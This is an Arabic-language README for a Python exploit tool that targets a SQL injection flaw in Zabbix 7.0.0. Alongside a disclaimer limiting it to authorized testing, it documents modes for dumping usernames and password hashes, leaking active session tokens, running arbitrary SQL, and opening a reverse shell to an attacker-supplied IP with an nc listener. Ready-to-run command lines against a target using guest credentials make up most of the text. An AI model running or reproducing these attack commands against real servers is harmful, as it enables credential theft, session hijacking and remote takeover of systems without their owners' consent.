
هذا لأغراض تعليمية فقط. من فضلك لا تستخدمه ضد أنظمة غير مصرح بها.
نص بايثون لاستغلال ثغرة حقن SQL موثقة في Zabbix 7.0.0، يدعم أنماطًا متعددة من الإجراءات بما في ذلك استخراج بيانات المستخدمين، تسريب رموز الجلسة، تنفيذ الأوامر عن بعد (RCE)، وحقن استعلامات مخصصة.
⚠️ إخلاء مسؤولية:
هذا النص مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط.
لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
requestsقم بتثبيت المتطلبات إذا لزم الأمر:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
| Mode | Description | Requires Admin Token |
|---|---|---|
| leak-users | يقوم بتفريغ جميع معرفات المستخدمين وأسماء المستخدمين وتجزئة كلمات المرور والأدوار | ❌ |
| leak-tokens | يقوم بتفريغ جميع معرفات الجلسات النشطة من قاعدة البيانات | ❌ |
| rce | ينشئ شل عكسي عبر استغلال item.create | ✅ |
| custom | تشغيل أي استعلام SQL مخصص عبر الحقن | ❌ |
تفريغ تجزئة كلمات المرور للمستخدمين
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
تسريب رموز الجلسة
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
تنفيذ الأوامر عن بعد (شل عكسي)
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
حقن SQL مخصص
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Main exploit script
README.md # This documentation
Anthony (@874anthony)
أُعدّ بحب وفضول 🐍
هذا المشروع صدر تحت رخصة MIT. يُرجى الاستخدام بمسؤولية.